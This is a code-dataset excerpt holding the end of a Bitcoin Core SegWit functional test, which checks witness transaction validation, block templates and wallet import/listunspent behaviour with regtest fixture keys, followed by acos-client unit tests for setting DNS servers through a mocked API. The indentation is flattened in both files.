self.skip_mine(self.nodes[2], wit_ids[NODE_2][WIT_V1][0], True) # block 425
self.skip_mine(self.nodes[2], p2sh_ids[NODE_2][WIT_V0][0], True) # block 426
self.skip_mine(self.nodes[2], p2sh_ids[NODE_2][WIT_V1][0], True) # block 427
self.log.info("Verify unsigned p2sh witness txs without a redeem script are invalid")
self.fail_accept(self.nodes[2], "mandatory-script-verify-flag", p2sh_ids[NODE_2][WIT_V0][1], False)
self.fail_accept(self.nodes[2], "mandatory-script-verify-flag", p2sh_ids[NODE_2][WIT_V1][1], False)
self.nodes[2].generate(4) # blocks 428-431
self.log.info("Verify previous witness txs skipped for mining can now be mined")
assert_equal(len(self.nodes[2].getrawmempool()), 4)
blockhash = self.nodes[2].generate(1)[0] # block 432 (first block with new rules; 432 = 144 * 3)
sync_blocks(self.nodes)
assert_equal(len(self.nodes[2].getrawmempool()), 0)
segwit_tx_list = self.nodes[2].getblock(blockhash)["tx"]
assert_equal(len(segwit_tx_list), 5)
self.log.info("Verify default node can't accept txs with missing witness")
# unsigned, no scriptsig
self.fail_accept(self.nodes[0], "mandatory-script-verify-flag", wit_ids[NODE_0][WIT_V0][0], False)
self.fail_accept(self.nodes[0], "mandatory-script-verify-flag", wit_ids[NODE_0][WIT_V1][0], False)
self.fail_accept(self.nodes[0], "mandatory-script-verify-flag", p2sh_ids[NODE_0][WIT_V0][0], False)
self.fail_accept(self.nodes[0], "mandatory-script-verify-flag", p2sh_ids[NODE_0][WIT_V1][0], False)
# unsigned with redeem script
self.fail_accept(self.nodes[0], "mandatory-script-verify-flag", p2sh_ids[NODE_0][WIT_V0][0], False, witness_script(False, self.pubkey[0]))
self.fail_accept(self.nodes[0], "mandatory-script-verify-flag", p2sh_ids[NODE_0][WIT_V1][0], False, witness_script(True, self.pubkey[0]))
self.log.info("Verify block and transaction serialization rpcs return differing serializations depending on rpc serialization flag")
assert self.nodes[2].getblock(blockhash, False) != self.nodes[0].getblock(blockhash, False)
assert self.nodes[1].getblock(blockhash, False) == self.nodes[2].getblock(blockhash, False)
for tx_id in segwit_tx_list:
tx = FromHex(CTransaction(), self.nodes[2].gettransaction(tx_id)["hex"])
assert self.nodes[2].getrawtransaction(tx_id, False, blockhash) != self.nodes[0].getrawtransaction(tx_id, False, blockhash)
assert self.nodes[1].getrawtransaction(tx_id, False, blockhash) == self.nodes[2].getrawtransaction(tx_id, False, blockhash)
assert self.nodes[0].getrawtransaction(tx_id, False, blockhash) != self.nodes[2].gettransaction(tx_id)["hex"]
assert self.nodes[1].getrawtransaction(tx_id, False, blockhash) == self.nodes[2].gettransaction(tx_id)["hex"]
assert self.nodes[0].getrawtransaction(tx_id, False, blockhash) == tx.serialize_without_witness().hex()
self.log.info("Verify witness txs without witness data are invalid after the fork")
self.fail_accept(self.nodes[2], 'non-mandatory-script-verify-flag (Witness program hash mismatch) (code 64)', wit_ids[NODE_2][WIT_V0][2], sign=False)
self.fail_accept(self.nodes[2], 'non-mandatory-script-verify-flag (Witness program was passed an empty witness) (code 64)', wit_ids[NODE_2][WIT_V1][2], sign=False)
self.fail_accept(self.nodes[2], 'non-mandatory-script-verify-flag (Witness program hash mismatch) (code 64)', p2sh_ids[NODE_2][WIT_V0][2], sign=False, redeem_script=witness_script(False, self.pubkey[2]))
self.fail_accept(self.nodes[2], 'non-mandatory-script-verify-flag (Witness program was passed an empty witness) (code 64)', p2sh_ids[NODE_2][WIT_V1][2], sign=False, redeem_script=witness_script(True, self.pubkey[2]))
self.log.info("Verify default node can now use witness txs")
self.success_mine(self.nodes[0], wit_ids[NODE_0][WIT_V0][0], True) # block 432
self.success_mine(self.nodes[0], wit_ids[NODE_0][WIT_V1][0], True) # block 433
self.success_mine(self.nodes[0], p2sh_ids[NODE_0][WIT_V0][0], True) # block 434
self.success_mine(self.nodes[0], p2sh_ids[NODE_0][WIT_V1][0], True) # block 435
self.log.info("Verify sigops are counted in GBT with BIP141 rules after the fork")
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 1)
tmpl = self.nodes[0].getblocktemplate({'rules': ['segwit']})
assert tmpl['sizelimit'] >= 3999577 # actual maximum size is lower due to minimum mandatory non-witness data
assert tmpl['weightlimit'] == 4000000
assert tmpl['sigoplimit'] == 80000
assert tmpl['transactions'][0]['txid'] == txid
assert tmpl['transactions'][0]['sigops'] == 8
self.nodes[0].generate(1) # Mine a block to clear the gbt cache
self.log.info("Non-segwit miners are able to use GBT response after activation.")
# Create a 3-tx chain: tx1 (non-segwit input, paying to a segwit output) ->
# tx2 (segwit input, paying to a non-segwit output) ->
# tx3 (non-segwit input, paying to a non-segwit output).
# tx1 is allowed to appear in the block, but no others.
txid1 = send_to_witness(1, self.nodes[0], find_spendable_utxo(self.nodes[0], 50), self.pubkey[0], False, Decimal("49.996"))
hex_tx = self.nodes[0].gettransaction(txid)['hex']
tx = FromHex(CTransaction(), hex_tx)
assert tx.wit.is_null() # This should not be a segwit input
assert txid1 in self.nodes[0].getrawmempool()
# Now create tx2, which will spend from txid1.
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(int(txid1, 16), 0), b''))
tx.vout.append(CTxOut(int(49.99 * COIN), CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE])))
tx2_hex = self.nodes[0].signrawtransactionwithwallet(ToHex(tx))['hex']
txid2 = self.nodes[0].sendrawtransaction(tx2_hex)
tx = FromHex(CTransaction(), tx2_hex)
assert not tx.wit.is_null()
# Now create tx3, which will spend from txid2
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(int(txid2, 16), 0), b""))
tx.vout.append(CTxOut(int(49.95 * COIN), CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE]))) # Huge fee
tx.calc_sha256()
txid3 = self.nodes[0].sendrawtransaction(ToHex(tx))
assert tx.wit.is_null()
assert txid3 in self.nodes[0].getrawmempool()
# Check that getblocktemplate includes all transactions.
template = self.nodes[0].getblocktemplate({"rules": ["segwit"]})
template_txids = [t['txid'] for t in template['transactions']]
assert txid1 in template_txids
assert txid2 in template_txids
assert txid3 in template_txids
# Check that wtxid is properly reported in mempool entry
assert_equal(int(self.nodes[0].getmempoolentry(txid3)["wtxid"], 16), tx.calc_sha256(True))
# Mine a block to clear the gbt cache again.
self.nodes[0].generate(1)
self.log.info("Verify behaviour of importaddress and listunspent")
# Some public keys to be used later
pubkeys = [
"0363D44AABD0F1699138239DF2F042C3282C0671CC7A76826A55C8203D90E39242", # cPiM8Ub4heR9NBYmgVzJQiUH1if44GSBGiqaeJySuL2BKxubvgwb
"02D3E626B3E616FC8662B489C123349FECBFC611E778E5BE739B257EAE4721E5BF", # cPpAdHaD6VoYbW78kveN2bsvb45Q7G5PhaPApVUGwvF8VQ9brD97
"04A47F2CBCEFFA7B9BCDA184E7D5668D3DA6F9079AD41E422FA5FD7B2D458F2538A62F5BD8EC85C2477F39650BD391EA6250207065B2A81DA8B009FC891E898F0E", # 91zqCU5B9sdWxzMt1ca3VzbtVm2YM6Hi5Rxn4UDtxEaN9C9nzXV
"02A47F2CBCEFFA7B9BCDA184E7D5668D3DA6F9079AD41E422FA5FD7B2D458F2538", # cPQFjcVRpAUBG8BA9hzr2yEzHwKoMgLkJZBBtK9vJnvGJgMjzTbd
"036722F784214129FEB9E8129D626324F3F6716555B603FFE8300BBCB882151228", # cQGtcm34xiLjB1v7bkRa4V3aAc9tS2UTuBZ1UnZGeSeNy627fN66
"0266A8396EE936BF6D99D17920DB21C6C7B1AB14C639D5CD72B300297E416FD2EC", # cTW5mR5M45vHxXkeChZdtSPozrFwFgmEvTNnanCW6wrqwaCZ1X7K
"0450A38BD7F0AC212FEBA77354A9B036A32E0F7C81FC4E0C5ADCA7C549C4505D2522458C2D9AE3CEFD684E039194B72C8A10F9CB9D4764AB26FCC2718D421D3B84", # 92h2XPssjBpsJN5CqSP7v9a7cf2kgDunBC6PDFwJHMACM1rrVBJ
]
# Import a compressed key and an uncompressed key, generate some multisig addresses
self.nodes[0].importprivkey("92e6XLo5jVAVwrQKPNTs93oQco8f8sDNBcpv73Dsrs397fQtFQn")
uncompressed_spendable_address = ["mvozP4UwyGD2mGZU4D2eMvMLPB9WkMmMQu"]
self.nodes[0].importprivkey("cNC8eQ5dg3mFAVePDX4ddmPYpPbw41r9bm2jd1nLJT77e6RrzTRR")
compressed_spendable_address = ["mmWQubrDomqpgSYekvsU7HWEVjLFHAakLe"]
assert not self.nodes[0].getaddressinfo(uncompressed_spendable_address[0])['iscompressed']
assert self.nodes[0].getaddressinfo(compressed_spendable_address[0])['iscompressed']
self.nodes[0].importpubkey(pubkeys[0])
compressed_solvable_address = [key_to_p2pkh(pubkeys[0])]
self.nodes[0].importpubkey(pubkeys[1])
compressed_solvable_address.append(key_to_p2pkh(pubkeys[1]))
self.nodes[0].importpubkey(pubkeys[2])
uncompressed_solvable_address = [key_to_p2pkh(pubkeys[2])]
spendable_anytime = [] # These outputs should be seen anytime after importprivkey and addmultisigaddress
spendable_after_importaddress = [] # These outputs should be seen after importaddress
solvable_after_importaddress = [] # These outputs should be seen after importaddress but not spendable
unsolvable_after_importaddress = [] # These outputs should be unsolvable after importaddress
solvable_anytime = [] # These outputs should be solvable after importpubkey
unseen_anytime = [] # These outputs should never be seen
uncompressed_spendable_address.append(self.nodes[0].addmultisigaddress(2, [uncompressed_spendable_address[0], compressed_spendable_address[0]])['address'])
uncompressed_spendable_address.append(self.nodes[0].addmultisigaddress(2, [uncompressed_spendable_address[0], uncompressed_spendable_address[0]])['address'])
compressed_spendable_address.append(self.nodes[0].addmultisigaddress(2, [compressed_spendable_address[0], compressed_spendable_address[0]])['address'])
uncompressed_solvable_address.append(self.nodes[0].addmultisigaddress(2, [compressed_spendable_address[0], uncompressed_solvable_address[0]])['address'])
compressed_solvable_address.append(self.nodes[0].addmultisigaddress(2, [compressed_spendable_address[0], compressed_solvable_address[0]])['address'])
compressed_solvable_address.append(self.nodes[0].addmultisigaddress(2, [compressed_solvable_address[0], compressed_solvable_address[1]])['address'])
# Test multisig_without_privkey
# We have 2 public keys without private keys, use addmultisigaddress to add to wallet.
# Money sent to P2SH of multisig of this should only be seen after importaddress with the BASE58 P2SH address.
multisig_without_privkey_address = self.nodes[0].addmultisigaddress(2, [pubkeys[3], pubkeys[4]])['address']
script = CScript([OP_2, hex_str_to_bytes(pubkeys[3]), hex_str_to_bytes(pubkeys[4]), OP_2, OP_CHECKMULTISIG])
solvable_after_importaddress.append(CScript([OP_HASH160, hash160(script), OP_EQUAL]))
for i in compressed_spendable_address:
v = self.nodes[0].getaddressinfo(i)
if (v['isscript']):
[bare, p2sh, p2wsh, p2sh_p2wsh] = self.p2sh_address_to_script(v)
# p2sh multisig with compressed keys should always be spendable
spendable_anytime.extend([p2sh])
# bare multisig can be watched and signed, but is not treated as ours
solvable_after_importaddress.extend([bare])
# P2WSH and P2SH(P2WSH) multisig with compressed keys are spendable after direct importaddress
spendable_after_importaddress.extend([p2wsh, p2sh_p2wsh])
else:
[p2wpkh, p2sh_p2wpkh, p2pk, p2pkh, p2sh_p2pk, p2sh_p2pkh, p2wsh_p2pk, p2wsh_p2pkh, p2sh_p2wsh_p2pk, p2sh_p2wsh_p2pkh] = self.p2pkh_address_to_script(v)
# normal P2PKH and P2PK with compressed keys should always be spendable
spendable_anytime.extend([p2pkh, p2pk])
# P2SH_P2PK, P2SH_P2PKH with compressed keys are spendable after direct importaddress
spendable_after_importaddress.extend([p2sh_p2pk, p2sh_p2pkh, p2wsh_p2pk, p2wsh_p2pkh, p2sh_p2wsh_p2pk, p2sh_p2wsh_p2pkh])
# P2WPKH and P2SH_P2WPKH with compressed keys should always be spendable
spendable_anytime.extend([p2wpkh, p2sh_p2wpkh])
for i in uncompressed_spendable_address:
v = self.nodes[0].getaddressinfo(i)
if (v['isscript']):
[bare, p2sh, p2wsh, p2sh_p2wsh] = self.p2sh_address_to_script(v)
# p2sh multisig with uncompressed keys should always be spendable
spendable_anytime.extend([p2sh])
# bare multisig can be watched and signed, but is not treated as ours
solvable_after_importaddress.extend([bare])
# P2WSH and P2SH(P2WSH) multisig with uncompressed keys are never seen
unseen_anytime.extend([p2wsh, p2sh_p2wsh])
else:
[p2wpkh, p2sh_p2wpkh, p2pk, p2pkh, p2sh_p2pk, p2sh_p2pkh, p2wsh_p2pk, p2wsh_p2pkh, p2sh_p2wsh_p2pk, p2sh_p2wsh_p2pkh] = self.p2pkh_address_to_script(v)
# normal P2PKH and P2PK with uncompressed keys should always be spendable
spendable_anytime.extend([p2pkh, p2pk])
# P2SH_P2PK and P2SH_P2PKH are spendable after direct importaddress
spendable_after_importaddress.extend([p2sh_p2pk, p2sh_p2pkh])
# Witness output types with uncompressed keys are never seen
unseen_anytime.extend([p2wpkh, p2sh_p2wpkh, p2wsh_p2pk, p2wsh_p2pkh, p2sh_p2wsh_p2pk, p2sh_p2wsh_p2pkh])
for i in compressed_solvable_address:
v = self.nodes[0].getaddressinfo(i)
if (v['isscript']):
# Multisig without private is not seen after addmultisigaddress, but seen after importaddress
[bare, p2sh, p2wsh, p2sh_p2wsh] = self.p2sh_address_to_script(v)
solvable_after_importaddress.extend([bare, p2sh, p2wsh, p2sh_p2wsh])
else:
[p2wpkh, p2sh_p2wpkh, p2pk, p2pkh, p2sh_p2pk, p2sh_p2pkh, p2wsh_p2pk, p2wsh_p2pkh, p2sh_p2wsh_p2pk, p2sh_p2wsh_p2pkh] = self.p2pkh_address_to_script(v)
# normal P2PKH, P2PK, P2WPKH and P2SH_P2WPKH with compressed keys should always be seen
solvable_anytime.extend([p2pkh, p2pk, p2wpkh, p2sh_p2wpkh])
# P2SH_P2PK, P2SH_P2PKH with compressed keys are seen after direct importaddress
solvable_after_importaddress.extend([p2sh_p2pk, p2sh_p2pkh, p2wsh_p2pk, p2wsh_p2pkh, p2sh_p2wsh_p2pk, p2sh_p2wsh_p2pkh])
for i in uncompressed_solvable_address:
v = self.nodes[0].getaddressinfo(i)
if (v['isscript']):
[bare, p2sh, p2wsh, p2sh_p2wsh] = self.p2sh_address_to_script(v)
# Base uncompressed multisig without private is not seen after addmultisigaddress, but seen after importaddress
solvable_after_importaddress.extend([bare, p2sh])
# P2WSH and P2SH(P2WSH) multisig with uncompressed keys are never seen
unseen_anytime.extend([p2wsh, p2sh_p2wsh])
else:
[p2wpkh, p2sh_p2wpkh, p2pk, p2pkh, p2sh_p2pk, p2sh_p2pkh, p2wsh_p2pk, p2wsh_p2pkh, p2sh_p2wsh_p2pk, p2sh_p2wsh_p2pkh] = self.p2pkh_address_to_script(v)
# normal P2PKH and P2PK with uncompressed keys should always be seen
solvable_anytime.extend([p2pkh, p2pk])
# P2SH_P2PK, P2SH_P2PKH with uncompressed keys are seen after direct importaddress
solvable_after_importaddress.extend([p2sh_p2pk, p2sh_p2pkh])
# Witness output types with uncompressed keys are never seen
unseen_anytime.extend([p2wpkh, p2sh_p2wpkh, p2wsh_p2pk, p2wsh_p2pkh, p2sh_p2wsh_p2pk, p2sh_p2wsh_p2pkh])
op1 = CScript([OP_1])
op0 = CScript([OP_0])
# 2N7MGY19ti4KDMSzRfPAssP6Pxyuxoi6jLe is the P2SH(P2PKH) version of mjoE3sSrb8ByYEvgnC3Aox86u1CHnfJA4V
unsolvable_address_key = hex_str_to_bytes("02341AEC7587A51CDE5279E0630A531AEA2615A9F80B17E8D9376327BAEAA59E3D")
unsolvablep2pkh = CScript([OP_DUP, OP_HASH160, hash160(unsolvable_address_key), OP_EQUALVERIFY, OP_CHECKSIG])
unsolvablep2wshp2pkh = CScript([OP_0, sha256(unsolvablep2pkh)])
p2shop0 = CScript([OP_HASH160, hash160(op0), OP_EQUAL])
p2wshop1 = CScript([OP_0, sha256(op1)])
unsolvable_after_importaddress.append(unsolvablep2pkh)
unsolvable_after_importaddress.append(unsolvablep2wshp2pkh)
unsolvable_after_importaddress.append(op1) # OP_1 will be imported as script
unsolvable_after_importaddress.append(p2wshop1)
unseen_anytime.append(op0) # OP_0 will be imported as P2SH address with no script provided
unsolvable_after_importaddress.append(p2shop0)
spendable_txid = []
solvable_txid = []
spendable_txid.append(self.mine_and_test_listunspent(spendable_anytime, 2))
solvable_txid.append(self.mine_and_test_listunspent(solvable_anytime, 1))
self.mine_and_test_listunspent(spendable_after_importaddress + solvable_after_importaddress + unseen_anytime + unsolvable_after_importaddress, 0)
importlist = []
for i in compressed_spendable_address + uncompressed_spendable_address + compressed_solvable_address + uncompressed_solvable_address:
v = self.nodes[0].getaddressinfo(i)
if (v['isscript']):
bare = hex_str_to_bytes(v['hex'])
importlist.append(bare.hex())
importlist.append(CScript([OP_0, sha256(bare)]).hex())
else:
pubkey = hex_str_to_bytes(v['pubkey'])
p2pk = CScript([pubkey, OP_CHECKSIG])
p2pkh = CScript([OP_DUP, OP_HASH160, hash160(pubkey), OP_EQUALVERIFY, OP_CHECKSIG])
importlist.append(p2pk.hex())
importlist.append(p2pkh.hex())
importlist.append(CScript([OP_0, hash160(pubkey)]).hex())
importlist.append(CScript([OP_0, sha256(p2pk)]).hex())
importlist.append(CScript([OP_0, sha256(p2pkh)]).hex())
importlist.append(unsolvablep2pkh.hex())
importlist.append(unsolvablep2wshp2pkh.hex())
importlist.append(op1.hex())
importlist.append(p2wshop1.hex())
for i in importlist:
# import all generated addresses. The wallet already has the private keys for some of these, so catch JSON RPC
# exceptions and continue.
try_rpc(-4, "The wallet already contains the private key for this address or script", self.nodes[0].importaddress, i, "", False, True)
self.nodes[0].importaddress(script_to_p2sh(op0)) # import OP_0 as address only
self.nodes[0].importaddress(multisig_without_privkey_address) # Test multisig_without_privkey
spendable_txid.append(self.mine_and_test_listunspent(spendable_anytime + spendable_after_importaddress, 2))
solvable_txid.append(self.mine_and_test_listunspent(solvable_anytime + solvable_after_importaddress, 1))
self.mine_and_test_listunspent(unsolvable_after_importaddress, 1)
self.mine_and_test_listunspent(unseen_anytime, 0)
spendable_txid.append(self.mine_and_test_listunspent(spendable_anytime + spendable_after_importaddress, 2))
solvable_txid.append(self.mine_and_test_listunspent(solvable_anytime + solvable_after_importaddress, 1))
self.mine_and_test_listunspent(unsolvable_after_importaddress, 1)
self.mine_and_test_listunspent(unseen_anytime, 0)
# Repeat some tests. This time we don't add witness scripts with importaddress
# Import a compressed key and an uncompressed key, generate some multisig addresses
self.nodes[0].importprivkey("927pw6RW8ZekycnXqBQ2JS5nPyo1yRfGNN8oq74HeddWSpafDJH")
uncompressed_spendable_address = ["mguN2vNSCEUh6rJaXoAVwY3YZwZvEmf5xi"]
self.nodes[0].importprivkey("cMcrXaaUC48ZKpcyydfFo8PxHAjpsYLhdsp6nmtB3E2ER9UUHWnw")
compressed_spendable_address = ["n1UNmpmbVUJ9ytXYXiurmGPQ3TRrXqPWKL"]
self.nodes[0].importpubkey(pubkeys[5])
compressed_solvable_address = [key_to_p2pkh(pubkeys[5])]
self.nodes[0].importpubkey(pubkeys[6])
uncompressed_solvable_address = [key_to_p2pkh(pubkeys[6])]
unseen_anytime = [] # These outputs should never be seen
solvable_anytime = [] # These outputs should be solvable after importpubkey
unseen_anytime = [] # These outputs should never be seen
uncompressed_spendable_address.append(self.nodes[0].addmultisigaddress(2, [uncompressed_spendable_address[0], compressed_spendable_address[0]])['address'])
uncompressed_spendable_address.append(self.nodes[0].addmultisigaddress(2, [uncompressed_spendable_address[0], uncompressed_spendable_address[0]])['address'])
compressed_spendable_address.append(self.nodes[0].addmultisigaddress(2, [compressed_spendable_address[0], compressed_spendable_address[0]])['address'])
uncompressed_solvable_address.append(self.nodes[0].addmultisigaddress(2, [compressed_solvable_address[0], uncompressed_solvable_address[0]])['address'])
compressed_solvable_address.append(self.nodes[0].addmultisigaddress(2, [compressed_spendable_address[0], compressed_solvable_address[0]])['address'])
premature_witaddress = []
for i in compressed_spendable_address:
v = self.nodes[0].getaddressinfo(i)
if (v['isscript']):
[bare, p2sh, p2wsh, p2sh_p2wsh] = self.p2sh_address_to_script(v)
premature_witaddress.append(script_to_p2sh(p2wsh))
else:
[p2wpkh, p2sh_p2wpkh, p2pk, p2pkh, p2sh_p2pk, p2sh_p2pkh, p2wsh_p2pk, p2wsh_p2pkh, p2sh_p2wsh_p2pk, p2sh_p2wsh_p2pkh] = self.p2pkh_address_to_script(v)
# P2WPKH, P2SH_P2WPKH are always spendable
spendable_anytime.extend([p2wpkh, p2sh_p2wpkh])
for i in uncompressed_spendable_address + uncompressed_solvable_address:
v = self.nodes[0].getaddressinfo(i)
if (v['isscript']):
[bare, p2sh, p2wsh, p2sh_p2wsh] = self.p2sh_address_to_script(v)
# P2WSH and P2SH(P2WSH) multisig with uncompressed keys are never seen
unseen_anytime.extend([p2wsh, p2sh_p2wsh])
else:
[p2wpkh, p2sh_p2wpkh, p2pk, p2pkh, p2sh_p2pk, p2sh_p2pkh, p2wsh_p2pk, p2wsh_p2pkh, p2sh_p2wsh_p2pk, p2sh_p2wsh_p2pkh] = self.p2pkh_address_to_script(v)
# P2WPKH, P2SH_P2WPKH with uncompressed keys are never seen
unseen_anytime.extend([p2wpkh, p2sh_p2wpkh])
for i in compressed_solvable_address:
v = self.nodes[0].getaddressinfo(i)
if (v['isscript']):
[bare, p2sh, p2wsh, p2sh_p2wsh] = self.p2sh_address_to_script(v)
premature_witaddress.append(script_to_p2sh(p2wsh))
else:
[p2wpkh, p2sh_p2wpkh, p2pk, p2pkh, p2sh_p2pk, p2sh_p2pkh, p2wsh_p2pk, p2wsh_p2pkh, p2sh_p2wsh_p2pk, p2sh_p2wsh_p2pkh] = self.p2pkh_address_to_script(v)
# P2SH_P2PK, P2SH_P2PKH with compressed keys are always solvable
solvable_anytime.extend([p2wpkh, p2sh_p2wpkh])
self.mine_and_test_listunspent(spendable_anytime, 2)
self.mine_and_test_listunspent(solvable_anytime, 1)
self.mine_and_test_listunspent(unseen_anytime, 0)
# Check that createrawtransaction/decoderawtransaction with non-v0 Bech32 works
v1_addr = program_to_witness(1, [3, 5])
v1_tx = self.nodes[0].createrawtransaction([getutxo(spendable_txid[0])], {v1_addr: 1})
v1_decoded = self.nodes[1].decoderawtransaction(v1_tx)
assert_equal(v1_decoded['vout'][0]['scriptPubKey']['addresses'][0], v1_addr)
assert_equal(v1_decoded['vout'][0]['scriptPubKey']['hex'], "51020305")
# Check that spendable outputs are really spendable
self.create_and_mine_tx_from_txids(spendable_txid)
# import all the private keys so solvable addresses become spendable
self.nodes[0].importprivkey("cPiM8Ub4heR9NBYmgVzJQiUH1if44GSBGiqaeJySuL2BKxubvgwb")
self.nodes[0].importprivkey("cPpAdHaD6VoYbW78kveN2bsvb45Q7G5PhaPApVUGwvF8VQ9brD97")
self.nodes[0].importprivkey("91zqCU5B9sdWxzMt1ca3VzbtVm2YM6Hi5Rxn4UDtxEaN9C9nzXV")
self.nodes[0].importprivkey("cPQFjcVRpAUBG8BA9hzr2yEzHwKoMgLkJZBBtK9vJnvGJgMjzTbd")
self.nodes[0].importprivkey("cQGtcm34xiLjB1v7bkRa4V3aAc9tS2UTuBZ1UnZGeSeNy627fN66")
self.nodes[0].importprivkey("cTW5mR5M45vHxXkeChZdtSPozrFwFgmEvTNnanCW6wrqwaCZ1X7K")
self.create_and_mine_tx_from_txids(solvable_txid)
# Test that importing native P2WPKH/P2WSH scripts works
for use_p2wsh in [False, True]:
if use_p2wsh:
scriptPubKey = "00203a59f3f56b713fdcf5d1a57357f02c44342cbf306ffe0c4741046837bf90561a"
transaction = "01000000000100e1f505000000002200203a59f3f56b713fdcf5d1a57357f02c44342cbf306ffe0c4741046837bf90561a00000000"
else:
scriptPubKey = "a9142f8c469c2f0084c48e11f998ffbe7efa7549f26d87"
transaction = "01000000000100e1f5050000000017a9142f8c469c2f0084c48e11f998ffbe7efa7549f26d8700000000"
self.nodes[1].importaddress(scriptPubKey, "", False)
rawtxfund = self.nodes[1].fundrawtransaction(transaction)['hex']
rawtxfund = self.nodes[1].signrawtransactionwithwallet(rawtxfund)["hex"]
txid = self.nodes[1].sendrawtransaction(rawtxfund)
assert_equal(self.nodes[1].gettransaction(txid, True)["txid"], txid)
assert_equal(self.nodes[1].listtransactions("*", 1, 0, True)[0]["txid"], txid)
# Assert it is properly saved
self.stop_node(1)
self.start_node(1)
assert_equal(self.nodes[1].gettransaction(txid, True)["txid"], txid)
assert_equal(self.nodes[1].listtransactions("*", 1, 0, True)[0]["txid"], txid)
def mine_and_test_listunspent(self, script_list, ismine):
utxo = find_spendable_utxo(self.nodes[0], 50)
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(int('0x' + utxo['txid'], 0), utxo['vout'])))
for i in script_list:
tx.vout.append(CTxOut(10000000, i))
tx.rehash()
signresults = self.nodes[0].signrawtransactionwithwallet(tx.serialize_without_witness().hex())['hex']
txid = self.nodes[0].sendrawtransaction(signresults, 0)
txs_mined[txid] = self.nodes[0].generate(1)[0]
sync_blocks(self.nodes)
watchcount = 0
spendcount = 0
for i in self.nodes[0].listunspent():
if (i['txid'] == txid):
watchcount += 1
if i['spendable']:
spendcount += 1
if (ismine == 2):
assert_equal(spendcount, len(script_list))
elif (ismine == 1):
assert_equal(watchcount, len(script_list))
assert_equal(spendcount, 0)
else:
assert_equal(watchcount, 0)
return txid
def p2sh_address_to_script(self, v):
bare = CScript(hex_str_to_bytes(v['hex']))
p2sh = CScript(hex_str_to_bytes(v['scriptPubKey']))
p2wsh = CScript([OP_0, sha256(bare)])
p2sh_p2wsh = CScript([OP_HASH160, hash160(p2wsh), OP_EQUAL])
return([bare, p2sh, p2wsh, p2sh_p2wsh])
def p2pkh_address_to_script(self, v):
pubkey = hex_str_to_bytes(v['pubkey'])
p2wpkh = CScript([OP_0, hash160(pubkey)])
p2sh_p2wpkh = CScript([OP_HASH160, hash160(p2wpkh), OP_EQUAL])
p2pk = CScript([pubkey, OP_CHECKSIG])
p2pkh = CScript(hex_str_to_bytes(v['scriptPubKey']))
p2sh_p2pk = CScript([OP_HASH160, hash160(p2pk), OP_EQUAL])
p2sh_p2pkh = CScript([OP_HASH160, hash160(p2pkh), OP_EQUAL])
p2wsh_p2pk = CScript([OP_0, sha256(p2pk)])
p2wsh_p2pkh = CScript([OP_0, sha256(p2pkh)])
p2sh_p2wsh_p2pk = CScript([OP_HASH160, hash160(p2wsh_p2pk), OP_EQUAL])
p2sh_p2wsh_p2pkh = CScript([OP_HASH160, hash160(p2wsh_p2pkh), OP_EQUAL])
return [p2wpkh, p2sh_p2wpkh, p2pk, p2pkh, p2sh_p2pk, p2sh_p2pkh, p2wsh_p2pk, p2wsh_p2pkh, p2sh_p2wsh_p2pk, p2sh_p2wsh_p2pkh]
def create_and_mine_tx_from_txids(self, txids, success=True):
tx = CTransaction()
for i in txids:
txtmp = CTransaction()
txraw = self.nodes[0].getrawtransaction(i, 0, txs_mined[i])
f = BytesIO(hex_str_to_bytes(txraw))
txtmp.deserialize(f)
for j in range(len(txtmp.vout)):
tx.vin.append(CTxIn(COutPoint(int('0x' + i, 0), j)))
tx.vout.append(CTxOut(0, CScript()))
tx.rehash()
signresults = self.nodes[0].signrawtransactionwithwallet(tx.serialize_without_witness().hex())['hex']
self.nodes[0].sendrawtransaction(signresults, 0)
self.nodes[0].generate(1)
sync_blocks(self.nodes)
if __name__ == '__main__':
SegWitTest().main()
| mit | 2,694,981,483,760,619,500 | 60.056951 | 224 | 0.656306 | false |
a10networks/acos-client | acos_client/tests/unit/v30/test_dns.py | 1 | 3344 | # Copyright (C) 2016, A10 Networks Inc. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import unicode_literals
try:
import unittest
from unittest import mock
except ImportError:
import mock
import unittest2 as unittest
from acos_client.v30 import dns
class TestDns(unittest.TestCase):
def setUp(self):
self.client = mock.MagicMock()
self.target = dns.DNS(self.client)
self.url_prefix = "/axapi/v3/ip/dns/"
def test_primary_ipv4(self):
expected = '192.0.2.4'
self.target.set(primary=expected)
expected_payload = {'primary': {'ip-v4-addr': expected}}
self.client.http.request.assert_called_with("POST", self.url_prefix + 'primary',
expected_payload, mock.ANY, axapi_args=None,
max_retries=None, timeout=mock.ANY)
def test_primary_ipv6(self):
expected = '0:0:0:0:0:FFFF:129.144.52.38'
self.target.set(primary=expected)
expected_payload = {'primary': {'ip-v6-addr': expected}}
self.client.http.request.assert_called_with("POST", self.url_prefix + 'primary',
expected_payload, mock.ANY, axapi_args=None,
max_retries=None, timeout=mock.ANY)
def test_secondary_ipv4(self):
expected = '192.0.2.5'
self.target.set(secondary=expected)
expected_payload = {'secondary': {'ip-v4-addr': expected}}
self.client.http.request.assert_called_with("POST", self.url_prefix + 'secondary',
expected_payload, mock.ANY, axapi_args=None,
max_retries=None, timeout=mock.ANY)
def test_secondary_ipv6(self):
expected = '0:0:0:0:0:FFFF:129.144.52.39'
self.target.set(secondary=expected)
expected_payload = {'secondary': {'ip-v6-addr': expected}}
self.client.http.request.assert_called_with("POST", self.url_prefix + 'secondary',
expected_payload, mock.ANY, axapi_args=None,
max_retries=None, timeout=mock.ANY)
def test_suffix(self):
expected = 'example.com'
self.target.set(suffix=expected)
expected_payload = {'suffix': {'domain-name': expected}}
self.client.http.request.assert_called_with("POST", self.url_prefix + 'suffix',
expected_payload, mock.ANY, axapi_args=None,
max_retries=None, timeout=mock.ANY)
| apache-2.0 | -3,787,857,098,440,864,300 | 40.283951 | 96 | 0.57506 | false |
